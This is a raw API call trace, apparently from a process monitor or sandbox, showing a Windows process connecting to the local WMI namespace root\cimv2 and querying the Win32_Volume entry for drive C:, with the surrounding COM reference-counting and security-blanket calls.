	[0172.164] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc21490, riid=0x1c68b810*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c68b7f0 | out: ppvObject=0x1c68b7f0*=0x1cc21490) returned 0x0
	[0172.164] WbemDefPath:IUnknown:Release (This=0x1cc21490) returned 0x2
	[0172.165] WbemDefPath:IUnknown:Release (This=0x1cc21490) returned 0x1
	[0172.221] CoGetContextToken (in: pToken=0x1c68b910 | out: pToken=0x1c68b910) returned 0x0
	[0172.221] CoGetContextToken (in: pToken=0x1c68b850 | out: pToken=0x1c68b850) returned 0x0
	[0172.221] WbemDefPath:IUnknown:AddRef (This=0x1cc21490) returned 0x2
	[0172.221] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc21490, riid=0x1c68b990*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c68b970 | out: ppvObject=0x1c68b970*=0x1cc21490) returned 0x0
	[0172.221] WbemDefPath:IUnknown:Release (This=0x1cc21490) returned 0x2
	[0172.222] WbemDefPath:IUnknown:AddRef (This=0x1cc21490) returned 0x3
	[0172.222] WbemDefPath:IWbemPath:SetText (This=0x1cc21490, uMode=0x4, pszPath="//./root/cimv2") returned 0x0
	[0172.222] WbemDefPath:IUnknown:Release (This=0x1cc21490) returned 0x2
	[0172.222] CoGetContextToken (in: pToken=0x1c68c990 | out: pToken=0x1c68c990) returned 0x0
	[0172.223] CoGetContextToken (in: pToken=0x1c68c8d0 | out: pToken=0x1c68c8d0) returned 0x0
	[0172.223] WbemDefPath:IUnknown:AddRef (This=0x1cc21390) returned 0x2
	[0172.223] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc21390, riid=0x1c68ca10*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c68c9f0 | out: ppvObject=0x1c68c9f0*=0x1cc21390) returned 0x0
	[0172.223] WbemDefPath:IUnknown:Release (This=0x1cc21390) returned 0x2
	[0172.223] WbemDefPath:IUnknown:AddRef (This=0x1cc21390) returned 0x3
	[0172.223] WbemDefPath:IWbemPath:SetText (This=0x1cc21390, uMode=0x4, pszPath="\\\\localhost\\root\\cimv2") returned 0x0
	[0172.223] WbemDefPath:IUnknown:Release (This=0x1cc21390) returned 0x2
	[0172.225] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc21390, puCount=0x1c68cca0 | out: puCount=0x1c68cca0*=0x2) returned 0x0
	[0172.226] WbemDefPath:IWbemPath:GetText (in: This=0x1cc21390, lFlags=4, puBuffLength=0x1c68cca0*=0x0, pszText=0x0 | out: puBuffLength=0x1c68cca0*=0x17, pszText=0x0) returned 0x0
	[0172.227] WbemDefPath:IWbemPath:GetText (in: This=0x1cc21390, lFlags=4, puBuffLength=0x1c68cca0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68cca0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0172.232] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc21390, puCount=0x1c68cc50 | out: puCount=0x1c68cc50*=0x2) returned 0x0
	[0172.232] WbemDefPath:IWbemPath:GetText (in: This=0x1cc21390, lFlags=4, puBuffLength=0x1c68cc50*=0x0, pszText=0x0 | out: puBuffLength=0x1c68cc50*=0x17, pszText=0x0) returned 0x0
	[0172.232] WbemDefPath:IWbemPath:GetText (in: This=0x1cc21390, lFlags=4, puBuffLength=0x1c68cc50*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68cc50*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0172.325] CoGetObjectContext (in: riid=0x1c68cb88*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c68cb80 | out: ppv=0x1c68cb80*=0x221868) returned 0x0
	[0172.325] IComThreadingInfo:GetCurrentApartmentType (in: This=0x221868, pAptType=0x1c68cba0 | out: pAptType=0x1c68cba0*=1) returned 0x0
	[0172.325] IUnknown:QueryInterface (in: This=0x221868, riid=0x2fcf310*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c68cca8 | out: ppvObject=0x1c68cca8*=0x0) returned 0x80004002
	[0172.325] IUnknown:Release (This=0x221868) returned 0x1
	[0172.325] IIDFromString (in: lpsz="{4590F811-1D3A-11D0-891F-00AA004B2E24}", lpiid=0x1c68c9c0 | out: lpiid=0x1c68c9c0) returned 0x0
	[0172.326] CoGetClassObject (in: rclsid=0x1b8749f8*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef322d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c68c830 | out: ppv=0x1c68c830*=0x1cc217d0) returned 0x0
	[0172.329] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc217d0, riid=0x7fef322d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c68c540 | out: ppvObject=0x1c68c540*=0x0) returned 0x80004002
	[0172.329] WbemLocator:IClassFactory:CreateInstance (in: This=0x1cc217d0, pUnkOuter=0x0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c528 | out: ppvObject=0x1c68c528*=0x1cc316b0) returned 0x0
	[0172.329] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc316b0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c430 | out: ppvObject=0x1c68c430*=0x1cc316b0) returned 0x0
	[0172.329] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc316b0, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c68c4b0 | out: ppvObject=0x1c68c4b0*=0x0) returned 0x80004002
	[0172.330] WbemLocator:IUnknown:AddRef (This=0x1cc316b0) returned 0x3
	[0172.330] CoGetContextToken (in: pToken=0x1c68c100 | out: pToken=0x1c68c100) returned 0x0
	[0172.330] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc316b0, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c0c0 | out: ppvObject=0x1c68c0c0*=0x0) returned 0x80004002
	[0172.330] CoGetContextToken (in: pToken=0x1c68c0d0 | out: pToken=0x1c68c0d0) returned 0x0
	[0172.330] WbemLocator:IUnknown:AddRef (This=0x1cc316b0) returned 0x4
	[0172.330] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc316b0, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c1e8 | out: ppvObject=0x1c68c1e8*=0x0) returned 0x80004002
	[0172.330] WbemLocator:IUnknown:Release (This=0x1cc316b0) returned 0x3
	[0172.331] WbemLocator:IUnknown:Release (This=0x1cc316b0) returned 0x2
	[0172.331] WbemLocator:IUnknown:Release (This=0x1cc217d0) returned 0x0
	[0172.331] WbemLocator:IUnknown:Release (This=0x1cc316b0) returned 0x1
	[0172.332] CoGetContextToken (in: pToken=0x1c68c6f0 | out: pToken=0x1c68c6f0) returned 0x0
	[0172.332] CoGetContextToken (in: pToken=0x1c68c630 | out: pToken=0x1c68c630) returned 0x0
	[0172.332] WbemLocator:IUnknown:AddRef (This=0x1cc316b0) returned 0x2
	[0172.332] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc316b0, riid=0x1c68c770*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c68c750 | out: ppvObject=0x1c68c750*=0x1cc316b0) returned 0x0
	[0172.333] WbemLocator:IUnknown:Release (This=0x1cc316b0) returned 0x2
	[0172.333] WbemLocator:IUnknown:Release (This=0x1cc316b0) returned 0x1
	[0172.333] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc21390, puCount=0x1c68cb50 | out: puCount=0x1c68cb50*=0x2) returned 0x0
	[0172.333] WbemDefPath:IWbemPath:GetText (in: This=0x1cc21390, lFlags=8, puBuffLength=0x1c68cb50*=0x0, pszText=0x0 | out: puBuffLength=0x1c68cb50*=0x17, pszText=0x0) returned 0x0
	[0172.333] WbemDefPath:IWbemPath:GetText (in: This=0x1cc21390, lFlags=8, puBuffLength=0x1c68cb50*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68cb50*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0172.342] CoCreateInstance (in: rclsid=0x642ffff15a8*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x642ffff14d8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x1c68c840 | out: ppv=0x1c68c840*=0x1cc31720) returned 0x0
	[0172.343] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1cc31720, strNetworkResource="\\\\localhost\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x1c68cad0 | out: ppNamespace=0x1c68cad0*=0x1cc344f8) returned 0x0
	[0172.526] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc344f8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c6b8 | out: ppvObject=0x1c68c6b8*=0x1b86dda0) returned 0x0
	[0172.526] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x1b86dda0, pProxy=0x1cc344f8, pAuthnSvc=0x1c68c6b0, pAuthzSvc=0x1c68c6ac, pServerPrincName=0x1c68c6d8, pAuthnLevel=0x1c68c6a8, pImpLevel=0x1c68c6c4, pAuthInfo=0x1c68c6e8, pCapabilites=0x1c68c6c0 | out: pAuthnSvc=0x1c68c6b0*=0xa, pAuthzSvc=0x1c68c6ac*=0x0, pServerPrincName=0x1c68c6d8, pAuthnLevel=0x1c68c6a8*=0x6, pImpLevel=0x1c68c6c4*=0x2, pAuthInfo=0x1c68c6e8, pCapabilites=0x1c68c6c0*=0x1) returned 0x0
	[0172.526] WbemLocator:IUnknown:Release (This=0x1b86dda0) returned 0x1
	[0172.526] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc344f8, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c658 | out: ppvObject=0x1c68c658*=0x1b86dde0) returned 0x0
	[0172.526] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc344f8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c5e8 | out: ppvObject=0x1c68c5e8*=0x1b86dda0) returned 0x0
	[0172.526] WbemLocator:IClientSecurity:SetBlanket (This=0x1b86dda0, pProxy=0x1cc344f8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0172.526] WbemLocator:IUnknown:Release (This=0x1b86dda0) returned 0x2
	[0172.526] WbemLocator:IUnknown:Release (This=0x1b86dde0) returned 0x1
	[0172.526] CoTaskMemFree (pv=0x1b878560) 
	[0172.527] WbemLocator:IUnknown:Release (This=0x1cc31720) returned 0x0
	[0172.527] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc344f8, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c2d0 | out: ppvObject=0x1c68c2d0*=0x1b86dde0) returned 0x0
	[0172.527] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86dde0, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c68c350 | out: ppvObject=0x1c68c350*=0x0) returned 0x80004002
	[0172.536] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86dde0, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c68c0e8 | out: ppvObject=0x1c68c0e8*=0x0) returned 0x80004002
	[0172.539] WbemLocator:IUnknown:AddRef (This=0x1b86dde0) returned 0x3
	[0172.539] CoGetContextToken (in: pToken=0x1c68bfa0 | out: pToken=0x1c68bfa0) returned 0x0
	[0172.539] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86dde0, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bf60 | out: ppvObject=0x1c68bf60*=0x1b86dcc8) returned 0x0
	[0172.539] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b86dcc8, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c68bf90 | out: pCid=0x1c68bf90*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0172.539] WbemLocator:IUnknown:Release (This=0x1b86dcc8) returned 0x3
	[0172.539] CoGetContextToken (in: pToken=0x1c68bf70 | out: pToken=0x1c68bf70) returned 0x0
	[0172.539] WbemLocator:IUnknown:AddRef (This=0x1b86dde0) returned 0x4
	[0172.539] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86dde0, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c088 | out: ppvObject=0x1c68c088*=0x1b86ddb0) returned 0x0
	[0172.540] WbemLocator:IUnknown:Release (This=0x1b86dde0) returned 0x4
	[0172.540] WbemLocator:IRpcOptions:Query (in: This=0x1b86ddb0, pPrx=0x1b86dde0, dwProperty=2, pdwValue=0x1c68c0f8 | out: pdwValue=0x1c68c0f8) returned 0x80004002
	[0172.540] WbemLocator:IUnknown:Release (This=0x1b86ddb0) returned 0x3
	[0172.541] WbemLocator:IUnknown:Release (This=0x1b86dde0) returned 0x2
	[0172.542] CoGetContextToken (in: pToken=0x1c68c470 | out: pToken=0x1c68c470) returned 0x0
	[0172.542] CoGetContextToken (in: pToken=0x1c68c3b0 | out: pToken=0x1c68c3b0) returned 0x0
	[0172.542] WbemLocator:IUnknown:AddRef (This=0x1b86dde0) returned 0x3
	[0172.542] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86dde0, riid=0x1c68c4f0*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x1c68c4d0 | out: ppvObject=0x1c68c4d0*=0x1cc344f8) returned 0x0
	[0172.542] WbemLocator:IUnknown:Release (This=0x1b86dde0) returned 0x3
	[0172.542] WbemLocator:IUnknown:Release (This=0x1cc344f8) returned 0x2
	[0172.544] WbemLocator:IUnknown:Release (This=0x1cc344f8) returned 0x1
	[0172.545] CoGetContextToken (in: pToken=0x1c68ca70 | out: pToken=0x1c68ca70) returned 0x0
	[0172.545] WbemLocator:IUnknown:AddRef (This=0x1b86dde0) returned 0x2
	[0172.545] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86dde0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c640 | out: ppvObject=0x1c68c640*=0x1b86dde0) returned 0x0
	[0172.545] WbemLocator:IUnknown:Release (This=0x1b86dde0) returned 0x2
	[0172.545] WbemLocator:IUnknown:Release (This=0x1b86dde0) returned 0x1
	[0172.546] CoGetContextToken (in: pToken=0x1c68c710 | out: pToken=0x1c68c710) returned 0x0
	[0172.546] CoGetContextToken (in: pToken=0x1c68c650 | out: pToken=0x1c68c650) returned 0x0
	[0172.546] WbemLocator:IUnknown:AddRef (This=0x1b86dde0) returned 0x2
	[0172.546] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86dde0, riid=0x1c68c790*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x1c68c770 | out: ppvObject=0x1c68c770*=0x1cc344f8) returned 0x0
	[0172.546] WbemLocator:IUnknown:Release (This=0x1b86dde0) returned 0x2
	[0172.546] WbemLocator:IUnknown:AddRef (This=0x1cc344f8) returned 0x3
	[0172.546] IWbemServices:ExecQuery (in: This=0x1cc344f8, strQueryLanguage="WQL", strQuery="select * from Win32_Volume where Name='C:\\\\'", lFlags=16, pCtx=0x0, ppEnum=0x1c68cc08 | out: ppEnum=0x1c68cc08*=0x1cc345f8) returned 0x0
	[0172.554] IUnknown:QueryInterface (in: This=0x1cc345f8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c818 | out: ppvObject=0x1c68c818*=0x1cc34600) returned 0x0
	[0172.555] IClientSecurity:QueryBlanket (in: This=0x1cc34600, pProxy=0x1cc345f8, pAuthnSvc=0x1c68c810, pAuthzSvc=0x1c68c80c, pServerPrincName=0x1c68c838, pAuthnLevel=0x1c68c808, pImpLevel=0x1c68c824, pAuthInfo=0x1c68c848, pCapabilites=0x1c68c820 | out: pAuthnSvc=0x1c68c810*=0xa, pAuthzSvc=0x1c68c80c*=0x0, pServerPrincName=0x1c68c838, pAuthnLevel=0x1c68c808*=0x6, pImpLevel=0x1c68c824*=0x2, pAuthInfo=0x1c68c848, pCapabilites=0x1c68c820*=0x1) returned 0x0
	[0172.555] IUnknown:Release (This=0x1cc34600) returned 0x1
	[0172.555] IUnknown:QueryInterface (in: This=0x1cc345f8, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c7b8 | out: ppvObject=0x1c68c7b8*=0x1b86dae0) returned 0x0
	[0172.555] IUnknown:QueryInterface (in: This=0x1cc345f8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c748 | out: ppvObject=0x1c68c748*=0x1cc34600) returned 0x0
	[0172.555] IClientSecurity:SetBlanket (This=0x1cc34600, pProxy=0x1cc345f8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0172.560] IUnknown:Release (This=0x1cc34600) returned 0x2
	[0172.560] WbemLocator:IUnknown:Release (This=0x1b86dae0) returned 0x1
	[0172.560] CoTaskMemFree (pv=0x1b878590) 
	[0172.560] IUnknown:QueryInterface (in: This=0x1cc345f8, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c3f0 | out: ppvObject=0x1c68c3f0*=0x1b86dae0) returned 0x0
	[0172.561] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86dae0, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c68c470 | out: ppvObject=0x1c68c470*=0x0) returned 0x80004002
	[0172.568] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86dae0, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c68c208 | out: ppvObject=0x1c68c208*=0x0) returned 0x80004002
	[0172.569] WbemLocator:IUnknown:AddRef (This=0x1b86dae0) returned 0x3
	[0172.569] CoGetContextToken (in: pToken=0x1c68c0c0 | out: pToken=0x1c68c0c0) returned 0x0
	[0172.569] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86dae0, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c080 | out: ppvObject=0x1c68c080*=0x1b86d9c8) returned 0x0
	[0172.569] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b86d9c8, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c68c0b0 | out: pCid=0x1c68c0b0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0172.569] WbemLocator:IUnknown:Release (This=0x1b86d9c8) returned 0x3
	[0172.570] CoGetContextToken (in: pToken=0x1c68c090 | out: pToken=0x1c68c090) returned 0x0
	[0172.570] WbemLocator:IUnknown:AddRef (This=0x1b86dae0) returned 0x4
	[0172.570] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86dae0, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c1a8 | out: ppvObject=0x1c68c1a8*=0x1b86dab0) returned 0x0
	[0172.570] WbemLocator:IUnknown:Release (This=0x1b86dae0) returned 0x4
	[0172.570] WbemLocator:IRpcOptions:Query (in: This=0x1b86dab0, pPrx=0x1b86dae0, dwProperty=2, pdwValue=0x1c68c218 | out: pdwValue=0x1c68c218) returned 0x80004002
	[0172.570] WbemLocator:IUnknown:Release (This=0x1b86dab0) returned 0x3
	[0172.570] WbemLocator:IUnknown:Release (This=0x1b86dae0) returned 0x2
	[0172.570] CoGetContextToken (in: pToken=0x1c68c590 | out: pToken=0x1c68c590) returned 0x0
	[0172.570] CoGetContextToken (in: pToken=0x1c68c4d0 | out: pToken=0x1c68c4d0) returned 0x0
	[0172.570] WbemLocator:IUnknown:AddRef (This=0x1b86dae0) returned 0x3
	[0172.571] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86dae0, riid=0x1c68c610*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c68c5f0 | out: ppvObject=0x1c68c5f0*=0x1cc345f8) returned 0x0
	[0172.571] WbemLocator:IUnknown:Release (This=0x1b86dae0) returned 0x3
	[0172.571] IUnknown:Release (This=0x1cc345f8) returned 0x2
	[0172.571] IUnknown:Release (This=0x1cc345f8) returned 0x1
	[0172.571] WbemLocator:IUnknown:Release (This=0x1cc344f8) returned 0x2
	[0172.571] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc21390, puCount=0x1c68cbb0 | out: puCount=0x1c68cbb0*=0x2) returned 0x0
	[0172.571] WbemDefPath:IWbemPath:GetText (in: This=0x1cc21390, lFlags=4, puBuffLength=0x1c68cbb0*=0x0, pszText=0x0 | out: puBuffLength=0x1c68cbb0*=0x17, pszText=0x0) returned 0x0
	[0172.571] WbemDefPath:IWbemPath:GetText (in: This=0x1cc21390, lFlags=4, puBuffLength=0x1c68cbb0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68cbb0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0172.575] CoGetContextToken (in: pToken=0x1c68c7b0 | out: pToken=0x1c68c7b0) returned 0x0
	[0172.575] CoGetContextToken (in: pToken=0x1c68c6f0 | out: pToken=0x1c68c6f0) returned 0x0
	[0172.575] WbemLocator:IUnknown:AddRef (This=0x1b86dae0) returned 0x2
	[0172.575] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86dae0, riid=0x1c68c830*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c68c810 | out: ppvObject=0x1c68c810*=0x1cc345f8) returned 0x0
	[0172.575] WbemLocator:IUnknown:Release (This=0x1b86dae0) returned 0x2
	[0172.575] IUnknown:AddRef (This=0x1cc345f8) returned 0x3
	[0172.575] IEnumWbemClassObject:Clone (in: This=0x1cc345f8, ppEnum=0x1c68cc70 | out: ppEnum=0x1c68cc70*=0x1cc34788) returned 0x0
	[0172.650] IUnknown:QueryInterface (in: This=0x1cc34788, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c8c8 | out: ppvObject=0x1c68c8c8*=0x1cc34790) returned 0x0
